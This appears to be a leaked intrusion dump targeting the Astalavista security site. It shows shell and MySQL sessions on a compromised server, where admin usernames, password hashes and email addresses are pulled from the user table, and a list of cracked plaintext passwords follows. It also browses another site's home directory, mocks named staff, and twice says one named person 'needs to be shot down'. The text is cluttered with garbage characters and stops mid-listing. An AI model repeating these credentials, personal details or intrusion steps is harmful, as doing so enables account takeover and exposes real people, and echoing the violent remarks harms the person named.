<description>All availably Exploits.</description>
2 W% ]9 Q8 @ l8 v <language>en-us</language>
* M8 [: n& F0 j2 i# p5 L <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
- c$ }! R5 b' a% n: x# r <docs>http://blogs.law.harvard.edu/tech/rss</docs>
4 j, n7 G1 Z3 x; x- { <generator>Astalavista.com</generator>( X# E) L, f R' a$ x" k$ z2 a& A9 Z$ `
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘2 E2 c Y( Y( B4 H# }) A8 u7 T6 T# E
</channel>, u! P( _' t% |. O/ e: Z! R
</rss>’;
* ~$ A) y/ t% d% B8 s. n2 Z1 f- r9 R4 l* y5 S* [- ~
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
: U# h3 c* f! W! @7 o9 A5 s4 J unlink (FULLPATH . ‘/feed/exploits.xml’);
6 i- y7 l v) }" j, ]/ c% N) r }
& g- f! W# R5 D7 {4 W. U* M
9 ^2 p) Z# h+ z- P file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);: B. F7 m+ j! ^5 F
[snip]. G+ [* ]8 B$ F; A% y: C5 d
% d( i3 P; D6 x: F' [
sh-3.2$ cat exploits.sh% `6 N0 o' p. y7 l0 j% r
#!/bin/sh
5 f) @/ p- f# I2 [; C2 g% } X% @0 e6 I7 O# c
###########################################################
; Z% `; u( @$ o, m7 `# #
' F5 E) D; [' G* s) m! w# Title: milw0rm exploits adder #
7 Y5 p3 I5 x5 {: C# Description: Add all milw0rm exploits to the #
W# H. p6 H' x! h, l9 p. f# Astalavista.com database #+ F" q V1 O, D- P' X& [
# #: s, t+ F, X0 Y+ J, }7 I
# Company: Astalavista Group #$ i3 _( O( F: q" ^ B4 u
# Author: Paulo M. Santos #
. {5 y8 ~0 z3 z! G7 Q% n# E-Mail: 链接标记paulo.santos@astalavista.ch #8 o& `7 x! p2 ~7 b2 _: C
# #3 F% }" Z0 z' m" u) o
###########################################################
; x% x+ ]- W3 t# E5 H0 C: q4 [8 S- ~- \# ~ A7 d# M! j
# path, I% V% p8 K" r% o+ p
this_path=/home/com/public_html/modifications/cronjobs
$ x0 T' }" c1 P, R6 a, \
; S8 a/ n- L/ F" y# change directory6 R L- \: l6 ~# H
cd $this_path
/ _& X, v7 [* h1 ycd tmp/$ z/ R, s8 N8 Q+ I( C
5 y, _! `* @+ l; O0 V
# delete files( \% W9 ]. \# _0 v; n
rm -rf milw0rm.tar.* &
/ d8 ]+ x6 \- S- Y" [, {rm -rf milw0rm/ &
4 N5 W* o5 _8 l3 f: k5 _8 d: F. P7 x( b; b1 P
# wget milw0rm paket# {6 O2 U# E! z6 {8 }. V; g3 F
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
+ m7 h: p* L: p) X* h: `+ i- a8 i9 n! R9 n' `- ?% y1 c2 e" ]
# extract milw0rm paket
k7 U4 v, r* A. P( S4 Rtar -xvf milw0rm.tar.bz20 _9 D$ x1 A9 w) T5 P2 J5 D
$ a$ R4 j. L3 n6 [5 j- M) w+ @
# change owner
. t3 ?, m8 [) Zchown -R com .# O" y* c5 R2 u' L5 L9 E
chgrp -R com .
. H9 }; v2 q1 L- ~5 G; X% n* ^9 J( o& v3 T
# execute php script
B8 V$ p$ J# ?% c& R! {, Ocd $this_path3 x$ R1 a$ V. D; q; L$ Y" E+ J' g4 b
php -q exploits.php: y$ z" O# m# e/ \, U: p9 D7 ]
8 i. k$ X. @3 r# delete files
% V9 l/ E- T6 X8 C hrm -rf tmp/milw0rm.tar.*
# v% |# v/ M0 a* M! n- A C' ? G5 lrm -rf tmp/milw0rm/& Z% {3 D: n7 s4 B+ p
- m& n1 P$ e' R+ jsh-3.2$ echo “Paulo M. Santos needs to be shot down.”: J( Q6 [, ]( P) @) C, A
Paulo M. Santos needs to be shot down.
# K: L2 C: P; ^% L3 `
1 Z! m" d j: ]8 v+ p1 w1 }! Fmysql -u contrexxuser2 -p9 h3 P8 k' \9 d
Enter password:
1 L: H) L2 r, A) @; w+ _5 yWelcome to the MySQL monitor. Commands end with ; or \g.) n8 r/ ]2 W6 K9 r) p
Your MySQL connection id is 261694
& W _& K, M5 G" W3 UServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 n# g* y, m! h, M9 [& V
' Q2 t- j5 m, X/ H5 v- wType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 ~2 L2 f5 y* i+ N3 p9 Z: K! w8 O' q4 x5 ~$ U
mysql> show databases;2 o3 e8 m9 _# ^! s8 r0 Z4 [
+——————–+7 w1 b% F, m5 S" |0 N+ Z% i
| Database |
3 c/ _; B" U7 s) f/ j. N2 `5 l+——————–+& c: L+ C, n% o$ z6 O+ [
| information_schema |# Q/ `, ^4 t$ _+ K( a8 M4 }; B
| com_contrexx2 |% h$ U) d, ^8 Z6 \( s/ S/ @
| com_contrexx2_live |: R) ]6 V! _8 r+ K. q( u% o
| test |" x6 \: S/ \* R# p# O: [3 s
+——————–+ f# t" `( B# `9 P
4 rows in set (0.00 sec)
. O+ b7 I1 r2 p- l) A$ D6 H) b; q) W1 z$ R. a
mysql> use com_contrexx2_live7 j/ Z( Y1 U) g
Database changed- n! Q2 |* {* C
mysql> show tables;6 @3 u3 e$ g- R. u! U' {" V. E
+————————————————–+
5 `+ w; }: ]5 O* _& A| Tables_in_com_contrexx2_live |
1 V9 M2 f* F7 k" ~+————————————————–+) u% R3 p9 i5 `) U8 r% q
| cc_banner_counter |
! b3 J* p2 U( J| cc_search_counter |
3 {% x, c ^" F* ]( K# @& m| contrexx_access_group_dynamic_ids |* J* X3 M; g- p' G/ Y" i/ C* B
| contrexx_access_group_static_ids |$ Y: v: [ [0 S4 i1 g& ?5 d
| contrexx_access_rel_user_group |6 \; f: C' b# p' I. g, e; W
| contrexx_access_settings |
- u5 T, F8 Z0 ?| contrexx_access_user_attribute |
1 s0 v" B' v3 |# F- w! T& g; A% U| contrexx_access_user_attribute_name |# u/ f( M+ ^& e4 V
| contrexx_access_user_attribute_value |' V. f3 P8 c9 M% ?+ o5 Z
| contrexx_access_user_core_attribute |! i1 u9 ?- I% C) n& m# \% C/ Y/ H2 ^ E
| contrexx_access_user_groups |
+ Y0 g% C( N( N U| contrexx_access_user_mail |
; J o" v7 o% P. J| contrexx_access_user_profile |& G8 b7 R/ H7 E* v, E" J. h1 O
| contrexx_access_user_title |2 ]+ P5 E7 a+ C: G: l# U
| contrexx_access_user_validity |, ], V3 ]- w8 u9 B3 m
| contrexx_access_users |" p) R7 p: s y o! d M5 A/ S
| contrexx_backend_areas |
( H4 R. @& E" O' e. e| contrexx_backups |
, s3 ^; ?0 e9 @+ o) P| contrexx_content |9 G1 f+ h( y& L" ^; W( p, H
| contrexx_content_history |: N2 L* n! _! F# w- C
| contrexx_content_logfile |$ F, @4 r7 S L
| contrexx_content_navigation |6 \/ Q$ { x( A3 m. [$ J/ u6 ~- D
| contrexx_content_navigation_history |+ w* Z: P$ S/ p2 [/ \+ H5 a5 }
| contrexx_ids |
) Z0 r. s5 p1 i. s: o, J' u. s| contrexx_languages |, c' U: i7 _0 }. ?- [8 V+ M+ p
| contrexx_lib_country |- k+ A# ~: ?2 Q7 a8 X; |
| contrexx_log |5 E# |- T' r0 O, A
| contrexx_module_alias_source |
: x6 k( p7 x( z! j| contrexx_module_alias_target |
- S/ `* } o7 d- h" ]# H. l7 m| contrexx_module_block_blocks |
7 l, v: B! Z! g! a0 a| contrexx_module_block_rel_lang |" c% g9 N) u; l% r& x3 Z" ]8 w6 Z: p* H
| contrexx_module_block_rel_pages |
' F3 R+ J: F& }$ V. q| contrexx_module_block_settings |8 `# I7 b4 `- g! O$ U) \5 m# _: W
| contrexx_module_blog_categories |
% H8 _+ k, A$ c) n| contrexx_module_blog_comments |
% M5 y' F$ ?7 A1 `& b. X1 {: L| contrexx_module_blog_message_to_category |
9 H+ Z9 }4 l- i5 p4 r| contrexx_module_blog_messages |
3 ?8 q" }, l X: F: C, Q| contrexx_module_blog_messages_lang |% A& }* O, h- ~# I
| contrexx_module_blog_networks |
) `0 V% A1 ^4 e }& i| contrexx_module_blog_networks_lang |/ T4 A1 @7 p; k3 i0 A
| contrexx_module_blog_settings |) P* `. H G9 }, R: @/ n
| contrexx_module_blog_votes |! G9 ~: I- j! V. l
| contrexx_module_calendar |* O7 Y" @4 Q$ P
| contrexx_module_calendar_access |
, r: J3 V/ x! w| contrexx_module_calendar_categories |* x9 ]# r+ {+ W7 d# ?+ h ?- Z
| contrexx_module_calendar_form_data |. ~7 Q. H; {6 o8 A
| contrexx_module_calendar_form_fields |( v8 c- Z3 x0 c
| contrexx_module_calendar_registrations |5 ], s/ @* f1 e( e7 f5 K$ L/ r
| contrexx_module_calendar_settings |
I: m2 P# P4 w9 \# `: C| contrexx_module_calendar_style |
. V! f4 Y. C+ q+ a) K7 S }* c| contrexx_module_contact_form |
/ U" Q2 s$ |" ^0 L4 H4 g9 R| contrexx_module_contact_form_data |0 G9 x- [1 K! k, [8 U! c* J
| contrexx_module_contact_form_field |' |7 R( m6 Z/ Q3 l
| contrexx_module_contact_settings |
' G; D3 p( d2 x9 m3 ` i7 m* c2 o| contrexx_module_data_categories |+ Z" d( y% L6 l( d0 x+ e
| contrexx_module_data_message_to_category |
0 M" G# i% R$ W# d7 E6 Z| contrexx_module_data_messages |
( N( u7 b9 O& t+ O6 [! W| contrexx_module_data_messages_lang |* d8 G7 d3 I. E- I! r
| contrexx_module_data_placeholders |
- v6 f$ M* w1 S; ?+ s7 [; _$ d- _| contrexx_module_data_settings |
/ u4 D- N: ^: M& w' X| contrexx_module_directory_access |
& s' C: m: `1 x$ D| contrexx_module_directory_categories |
0 G, U8 i6 U1 g| contrexx_module_directory_dir |9 [. w# l' w5 q9 e6 t* S; o; N
| contrexx_module_directory_inputfields |; a/ g: b+ S$ T" e% q8 Z7 e0 w
| contrexx_module_directory_levels |8 d4 b: f! P( L6 P! ?3 _+ ?
| contrexx_module_directory_mail | |. o5 X9 _- Z: K0 K
| contrexx_module_directory_rel_dir_cat |
" h' m- p% S' G7 w! B }| contrexx_module_directory_rel_dir_level |7 @: b% {$ Y3 ?; u
| contrexx_module_directory_settings |
. P; v& o/ l1 t; _: z B- S| contrexx_module_directory_settings_google |3 n( N1 L8 J& U- c
| contrexx_module_directory_vote |
7 @ \) z% [1 ~; n* J# [| contrexx_module_docsys |
% y% M$ Y5 Q8 l3 r( s& i- A| contrexx_module_docsys_categories |: l7 w; p" [+ |9 G( i' ` Z1 I* i* m
| contrexx_module_egov_configuration |
# ^% G& _/ R0 S0 x" A1 b$ H| contrexx_module_egov_orders |% _6 ~$ Q1 x; b
| contrexx_module_egov_product_calendar |9 |0 @. r! q$ o* Y
| contrexx_module_egov_product_fields |
/ T. y. f2 Y3 K& n/ H: }| contrexx_module_egov_products |! ^# Q; O. H" j9 O
| contrexx_module_egov_settings |
1 @- t( b8 w* t) v| contrexx_module_exploits |
( H& @7 f6 ^/ @1 X) ^| contrexx_module_exploits_categories |
- C0 |* H) k/ N9 \' C# w| contrexx_module_feed_category |' u2 l6 G A2 l( k+ c0 V- K$ J" y
| contrexx_module_feed_news |$ @0 N6 t7 ~4 A0 y
| contrexx_module_feed_newsml_association |& C4 Q1 [, @- B5 L7 P2 u0 I
| contrexx_module_feed_newsml_categories |! J8 L# K% J" z
| contrexx_module_feed_newsml_documents |
4 b8 b- A- w" H7 R| contrexx_module_feed_newsml_providers |
' Z1 @0 B+ h. R' u( m! w' k& A( z| contrexx_module_forum_access |" q3 U. k9 u4 q$ ^% L- {- N4 L/ x
| contrexx_module_forum_categories |
2 C- A; S. P" ]# ?| contrexx_module_forum_categories_lang |1 h. _, E) i: E! F/ M
| contrexx_module_forum_notification |$ [" v5 m7 {" _* m9 t1 R5 w
| contrexx_module_forum_postings |/ r1 E; m- `* z6 Q6 l) T" C
| contrexx_module_forum_rating |
( \# F- b. W- p. _( [" C| contrexx_module_forum_settings |
" q6 k3 @$ Y) q( K( D0 A| contrexx_module_forum_statistics |2 b! c+ T3 M! m+ X: `3 ?. I: L3 ^
| contrexx_module_gallery_categories |
7 @' _; t5 [+ d! a. K* V| contrexx_module_gallery_comments |
; C' Z/ c+ T1 v3 c5 Q9 U| contrexx_module_gallery_language |: a2 N8 B) g n+ j# h7 ~
| contrexx_module_gallery_language_pics |
o' N8 A( a5 Q+ R2 o& \| contrexx_module_gallery_pictures |
3 Y% J H* W* [" E2 T! [, d| contrexx_module_gallery_settings |
" r/ \. n+ F2 B) e G' H| contrexx_module_gallery_votes |
8 h! ^1 p& [: [& b) V8 @+ J| contrexx_module_guestbook |- |5 s5 O' V2 E
| contrexx_module_guestbook_settings |
* E6 x, b) W9 D5 i5 }8 V0 Y" B W/ _| contrexx_module_livecam |
" [ C5 b4 N; b* Y& b| contrexx_module_livecam_settings |
+ Z6 m( l4 [% r$ q/ ^' || contrexx_module_market |
: z& ^; m s9 |& V( w' || contrexx_module_market_access |& Q ?) N0 g) r4 K1 h2 x* z( [3 k
| contrexx_module_market_categories |9 {( I) N" o* d" M/ B
| contrexx_module_market_mail |
" w% R% j4 p7 V6 l| contrexx_module_market_paypal |
& Z4 `- ]0 m/ b: || contrexx_module_market_settings |% F" A" B1 L* Z( K- s3 ~) ]1 @
| contrexx_module_market_spez_fields |
" X( w& e5 f! G$ v| contrexx_module_mediadir_access |
9 _0 `+ E! V, y _8 ~7 {$ I- p| contrexx_module_mediadir_categories |+ Q ?- |$ M7 l0 T' f
| contrexx_module_mediadir_comments |8 P$ p. }+ Q# H4 S' P3 b. I2 x
| contrexx_module_mediadir_dir | m3 [' \ g; x% U( N0 X' P
| contrexx_module_mediadir_inputfields |
0 N8 z- c, U! e4 d* x8 F| contrexx_module_mediadir_levels |
1 p& u( W' x# k) l. j: j( w; || contrexx_module_mediadir_mail |5 i) I) b9 N' `* O4 k/ x" ~* a
| contrexx_module_mediadir_rel_dir_cat |
% ? Z" G# |* L1 Y8 K5 [| contrexx_module_mediadir_rel_dir_level |3 _$ h5 v* t# q, E9 E2 W# m
| contrexx_module_mediadir_reports | p1 x8 D' S; H/ u
| contrexx_module_mediadir_settings |
/ R( ^$ Q4 C& ^| contrexx_module_mediadir_settings_google |
! H J! Z& U& _4 S# Z| contrexx_module_mediadir_vote |0 i2 w6 Y; |) c i
| contrexx_module_memberdir_directories |# v; y; _+ w* R9 T& }
| contrexx_module_memberdir_name |
& }& `; @) B0 k' Q9 g/ A' w| contrexx_module_memberdir_settings |8 q3 [- {3 q6 e/ n2 x
| contrexx_module_memberdir_values |& r ]( q7 h# W" U" C$ ^
| contrexx_module_nettools_allowed_groups |
/ @5 |) I: J5 B: t7 q" y3 m| contrexx_module_nettools_settings |; @% T; B- S# D) d. q
| contrexx_module_news |
! E( ]2 d- A" y/ x2 C4 }0 r| contrexx_module_news_access |1 r' w6 ~5 M2 l2 H- M
| contrexx_module_news_categories |! H- {' \% q4 U' H1 T( D
| contrexx_module_news_settings |
" _* }! Z7 O6 J2 z* }: M| contrexx_module_news_teaser_frame |6 l# O8 Z0 E3 r5 A5 C) a
| contrexx_module_news_teaser_frame_templates |2 ^0 `! u" |8 }0 w. }' D5 _
| contrexx_module_news_ticker |- l d p( F& D: d6 v; }
| contrexx_module_newsletter |8 f. D7 `6 |3 {) g6 J
| contrexx_module_newsletter_attachment |/ }7 l5 s3 N) J+ v1 w, w
| contrexx_module_newsletter_category |
$ ^" M8 O/ j7 g) e7 p1 l| contrexx_module_newsletter_confirm_mail |
$ B1 w* p. X& R" Z! d| contrexx_module_newsletter_rel_cat_news |) }* f# ~' J' e1 ~
| contrexx_module_newsletter_rel_user_cat |
% g: _; T) j$ T9 |& c| contrexx_module_newsletter_settings |3 P; Q4 J" j( Q/ b/ c2 U
| contrexx_module_newsletter_template |- w/ u+ d3 d" S' l/ ^0 @
| contrexx_module_newsletter_tmp_sending |0 @2 D# l% O [- e0 m( u
| contrexx_module_newsletter_user |) ~) K7 U; N# ]% E1 C' `1 R
| contrexx_module_newsletter_user_title |, q5 x9 q* j: O
| contrexx_module_onlinetools_defaultports |( C$ C+ G/ X: i/ T W
| contrexx_module_onlinetools_defaultports_back |6 g5 \. m6 H. k% e- f& r, G
| contrexx_module_onlinetools_geolitecity_blocks |. E7 B( `# x$ t, K9 Z& d2 ^' S
| contrexx_module_onlinetools_geolitecity_country |3 a. U, F. j$ B- `, B2 g
| contrexx_module_onlinetools_geolitecity_location |
# w- e& w L) D2 j( K| contrexx_module_podcast_category |
0 d* v" ?; A" o5 m7 X0 ]| contrexx_module_podcast_medium |
' ~. Y8 y% O; l5 x2 F5 W4 O| contrexx_module_podcast_rel_category_lang |
0 L7 m) s7 K" R% k- S1 r" U| contrexx_module_podcast_rel_medium_category |1 x9 N# b3 P/ I1 s, o' \. R; {
| contrexx_module_podcast_settings |4 [) T0 Y2 e, O' s
| contrexx_module_podcast_template |% w. _; P+ J, h1 O* K' H+ {/ C
| contrexx_module_proxydb |' T. l$ c( `9 m! N4 }
| contrexx_module_recommend |4 G! \% V3 v1 z9 Q. |
| contrexx_module_repository |
3 j U0 K% Q3 i( w) u| contrexx_module_securitynews_cats |
+ @; y ]; O7 b| contrexx_module_securitynews_feeds |
) {+ a- | A4 D9 O, U- F: f| contrexx_module_securitynews_news |
6 g( P% e8 v9 i| contrexx_module_shop_categories |
' j/ c5 T- k2 }- K2 I3 s; u0 h# h, N7 P| contrexx_module_shop_config |
3 C; R- X1 L$ e6 V0 I- n. D3 I/ |2 @| contrexx_module_shop_countries |
8 ?, y" J% s/ v. l| contrexx_module_shop_currencies |* I" ^1 p1 c$ _& z5 a+ m& y2 S
| contrexx_module_shop_customers |1 U( T+ A! i! k: p
| contrexx_module_shop_importimg |
/ Z5 w, @' S" y" ?| contrexx_module_shop_lsv |
/ W1 Y g& K6 L/ [| contrexx_module_shop_mail |! |6 E+ i2 _% y' m @) z
| contrexx_module_shop_mail_content |* z p; t: H+ L3 o2 V0 u
| contrexx_module_shop_manufacturer |
! s& }) P( n) W5 d| contrexx_module_shop_order_items |
: y* g5 U8 t3 s7 v| contrexx_module_shop_order_items_attributes |5 P. n6 `5 \! ]. j; i
| contrexx_module_shop_orders |$ S2 ?' r0 |, c% r
| contrexx_module_shop_payment |
2 g+ U/ D! ^5 J! _; h6 S2 p| contrexx_module_shop_payment_processors |
# [# V5 T& D' I$ l: P| contrexx_module_shop_pricelists |# T, u( f# p/ t8 d
| contrexx_module_shop_products |5 U9 u; @8 [4 s$ _& L- ?
| contrexx_module_shop_products_attributes |
2 w6 W S3 j- Y) P# `( M; x2 _$ I| contrexx_module_shop_products_attributes_name |; X( R/ B; R3 }) d+ a
| contrexx_module_shop_products_attributes_value |
P6 w- ]$ A7 Q6 |8 U' q% N| contrexx_module_shop_products_downloads |
1 f1 e' w7 x: O7 _" ^| contrexx_module_shop_rel_countries |' S; T @( c* d6 t0 i: k8 F$ T
| contrexx_module_shop_rel_payment |
+ ^$ Q! l6 B+ Y$ `* i6 {( [# U| contrexx_module_shop_rel_shipment |
8 v. g; d% O$ _% h4 g* G| contrexx_module_shop_shipment_cost |2 v3 p& X; r7 i( [2 j/ b7 G. `
| contrexx_module_shop_shipper |; U7 Z v" \8 o
| contrexx_module_shop_vat |: h3 [& s! ?( g, l( \
| contrexx_module_shop_zones |; W" G; c' J! O3 R( `' m
| contrexx_module_u2u_address_list |
* d( y% A0 E, [+ u5 g( t) }4 || contrexx_module_u2u_message_log |! Z F5 ]- m" o1 ? F. J
| contrexx_module_u2u_sent_messages |
- u! n$ i7 C1 H| contrexx_module_u2u_settings |
# Y4 o; h V2 K3 W| contrexx_module_u2u_user_log |* c8 Q5 |8 n7 p
| contrexx_modules |
2 @9 |5 X9 T0 F+ Y| contrexx_sessions |* U" i+ V7 X) V q8 `
| contrexx_settings |# N2 E1 e! t) u6 A7 s% q# z% \
| contrexx_settings_smtp |
' A1 {2 q0 F7 p. t) w1 }9 b| contrexx_skins |
9 A# g, y# S. S# l( r| contrexx_stats_browser |8 S6 x- ?& U. Q: @, K) \* H
| contrexx_stats_colourdepth |/ f o- m3 G1 c3 h! k1 d
| contrexx_stats_config | Y' r/ o. |+ ~$ @8 h* Q; M. z
| contrexx_stats_country |
2 N2 Y' G: z6 _6 g% _5 t# m: h| contrexx_stats_hostname |
$ e- A, v8 q7 V6 f# ^. w+ b| contrexx_stats_javascript |
, W6 m) b6 ^ s1 ?1 }) M) G9 E8 P* U, f| contrexx_stats_operatingsystem |1 J5 |& {$ n1 D: s$ p: t. P
| contrexx_stats_referer |% M: M- i0 k( K' i$ f
| contrexx_stats_requests |
. W- F5 K) f9 Y- S- N| contrexx_stats_requests_summary |0 Z6 C" c ?7 W5 y
| contrexx_stats_screenresolution |
1 E% t) M, x& f- D; q4 O| contrexx_stats_search |
0 r4 N# a) ^- O| contrexx_stats_spiders |0 V4 Q8 V7 d' E3 ?) L) I, m. T
| contrexx_stats_spiders_summary |
' H$ ?) E/ J& ~/ l. i9 S- L| contrexx_stats_visitors |2 o* d$ N% c7 ^: {
| contrexx_stats_visitors_summary |
0 U5 E0 z1 u+ }+ M. [| contrexx_voting_additionaldata |
; m- y1 I6 W' s| contrexx_voting_email |
3 d0 X7 m$ _) }+ }& Z| contrexx_voting_rel_email_system |1 l6 Z; e4 ]0 t+ ]
| contrexx_voting_results |
p3 {6 n5 a9 J9 i| contrexx_voting_system |
0 F2 \- A+ J8 U' R# f# ^: j| foo |: W8 Y" T, c, V- w# P% Q& f' E
+————————————————–+4 s& g" z6 ]0 @* F g
227 rows in set (0.01 sec) ~5 D) a- `9 s' a; {$ i
' |. ^9 r; P; d# C# g' s. rmysql> select count(*) as skids from contrexx_access_users;
* x9 u; I9 j0 C( v% T' E# y+——-+' R: n! X+ v- {) P! v
| skids |) @7 `; l: ~( h9 ?- I) K' _* g9 U
+——-+
6 B; Y0 l5 y3 h. t8 x& ]! P$ |4 }| 53699 |
' j+ ^ X* f5 a, z0 G1 \* ^+——-+
; F7 A3 [) U! K' z# Q& d+ ^1 row in set (0.00 sec)
) A; a- w) r. ]# m* k, a+ R: r6 g' O* Q; y
mysql> describe contrexx_access_users;
1 z4 O! D5 X5 E; J" j7 W+——————+——————————————+——+—–+————–+—————-+
3 b# B7 N* ]+ H. G( g| Field | Type | Null | Key | Default | Extra |
. S7 c; A- v0 C+——————+——————————————+——+—–+————–+—————-+8 \6 j' ]( E, N
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
, O9 y' s: H- Z( J' D# s| is_admin | tinyint(1) unsigned | NO | | 0 | | m/ s" S" J( `; R6 i: O7 ?/ P
| username | varchar(40) | YES | MUL | NULL | |
" q* [1 e6 `$ A& {. G9 W| password | varchar(32) | YES | | NULL | |6 ~7 j& n+ O" I' W& f6 D \
| regdate | int(14) unsigned | NO | | 0 | |% l1 N, p2 ~$ Y9 C
| expiration | int(14) unsigned | NO | | 0 | |
& B3 w/ x% k% h/ g| validity | int(10) unsigned | NO | | 0 | |
& J4 ^' F) @. A6 L" s| last_auth | int(14) unsigned | NO | | 0 | |
* |$ s5 @ Z4 i5 C1 y| last_activity | int(14) unsigned | NO | | 0 | |
/ Z9 N; x* k" L3 k+ m3 c" B: q| email | varchar(255) | YES | | NULL | |" m Y m" Y- H; o9 L& }
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |/ o. S5 f5 E* c9 C6 u
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
5 G1 C& b1 z- ^7 r4 ~" X- ~| backend_lang_id | int(2) unsigned | NO | | 0 | |
1 k0 h9 Z' [2 i| active | tinyint(1) | NO | | 0 | |# C$ K6 L P) a2 ]( Y
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |2 K. H K% @2 F; T0 i
| restore_key | varchar(32) | NO | | | |6 ^! [$ [) F: N& D5 X6 C% ~
| restore_key_time | int(14) unsigned | NO | | 0 | |
4 N/ V; M& l# r) _/ T, b& m| u2u_active | enum(’0′,’1′) | NO | | 1 | |; t! ]* r8 S2 z+ m4 e: d: t* x
+——————+——————————————+——+—–+————–+—————-+2 ~( q# c4 [# w# y$ u
18 rows in set (0.00 sec)7 Z9 a: e T0 ?! e& v! D4 ?# p* K
/ m1 }: K" l/ a0 O/ c3 hmysql> select username,password,email from contrexx_access_users where is_admin = 1;2 E7 o8 a# d8 U9 E
+————+———————————-+—————————–+
5 s' w9 ^" ]+ B1 j| username | password | email |: q+ j; G0 G' d0 f- P# J( Q4 h
+————+———————————-+—————————–+
+ H8 u# y# Z3 W7 r/ N| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |% |, ^, |! V0 V5 A5 `7 `5 N. g
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
+ Q) x0 }+ v7 i8 B6 U| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |5 y- x8 X ]" p
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
5 I' C1 J5 P+ {. g* `# c+————+———————————-+—————————–+! z# F) S: J* r& A
4 rows in set (0.04 sec)
1 X- j# B, T& y' i6 c+ H% G, S3 e ]9 ?
mysql> exit;, G' J7 P G8 _9 h
Bye' L3 @! x' J2 d# C) y
! y4 M& ~2 q8 G$ P9 K
[~] There you go, your “team of security and IT professionals” is a joke.
/ n7 C9 F8 u6 B& Z! y4 o4 }9 O' b) M) b6 c+ h& j0 {/ e, Q
+——————————+
! X3 Y8 p( I0 J3 z# Xsystem:f82BN3+_*5 W/ Z& o5 [" P) B0 ^# O* o; `
Be1er0ph0r:belerophor4astacom
+ f/ q( W* c; v* f) T1 Y- ^) Q# L1 nprozac:asta4cms!
$ T% @/ D) `( V& H: ^7 p9 mcommander:mpbdaagf6m
( g. z4 z! @8 p4 c1 D: jsykadul:ak29eral
5 C; ?9 h( b& |+——————————+
9 q& Z- I+ V Y5 s
j+ F) I2 L. ]- R$ D0 w# ^, p[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s); s' @# v: V0 {, U5 v
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.; {" {8 J, |1 r# x2 Z& k/ ?3 D5 L
2 z4 x# X: U% i; C! w5 ~) U4 p( W
[~] Lets move to astalavista.net now,7 P" x+ P& T5 i$ k2 d* i: z
1 d# T i" o2 v; j: o$ A. w
From <链接标记[url]https://www.astalavista.net/[/url]>:
! c9 r' k8 j6 Q>> Everyone knows that the best defense is a good offense.3 @- x& Y4 I7 l7 ^# Q% O' {
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
* \$ F# V2 u5 w0 N: t8 p& F>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
7 \, a U- K2 ~% i c>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”2 U+ y3 A' [$ ?7 n `
% n& j8 g! Y: K
>> Go ahead, try and hack our server . in a completely legal way!5 D/ S4 u- C! H( z7 J
>> Learn by doing: We offer our members tricky tasks and challenges on an! X& t. j7 G9 N- e! y& m/ Q! I) j
>> ongoing basis so you can test your knowledge and abilities. You can also
7 ?5 I2 y& W# W# K: h, @>> demonstrate what you.ve mastered by taking part in regular hacker contests
5 p9 D2 q: N/ ?>> and war games
* v3 _+ M5 [0 Z' ~ V9 l& P% }* c* v/ q2 K/ }; T, i5 S
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
5 k7 f" ]$ \0 }1 c) N* l3 `9 }8 l+ y0 J; J* ]
[-] Tricky task: Find home dir of astalavista.net
! `: P/ u/ U! f- E; @6 [
; N' |2 H+ o- f$ }/ h# Qsh-3.2$ ls -la ~astanet1 ^$ V$ p( F" y
total 48
1 Z% Y& F- Z6 B6 i7 H& X+ ndrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ." ?) Y* `2 i) r: O
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ @8 ?/ t( R) ~8 b- u/ e8 J/ l+ A
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
# y5 z7 o0 r2 K1 r4 ]# W% X. f-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
4 V" k, X! i/ n7 I$ S% b-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
S# O% W1 f) E7 Q8 C6 R-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
# B5 \* b, T7 r# ]-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# s7 @; E; v$ B% X( P! i
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains, M$ ?2 Q1 B, w! _% p- o9 y
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
, Y# {& w3 ~: W$ \( X1 `2 M! {! Adrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
# X% N) T* j2 H# s, ^4 ~lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html/ }% K& e8 ?3 f& [/ A
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow' A6 a: i' A; x7 s9 o8 z
# `) C) K+ Q* t. D% a
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/# U1 U( n' h# o' s2 H9 v9 ?# p
sh-3.2$ ls -la
6 l2 m8 y. l8 O4 E1 ?8 Etotal 200/ K5 E! I8 J$ X9 z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
5 A2 q% W+ q0 Q7 B1 h9 N$ [/ Cdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..+ {. I! U6 d" ~' Z: D
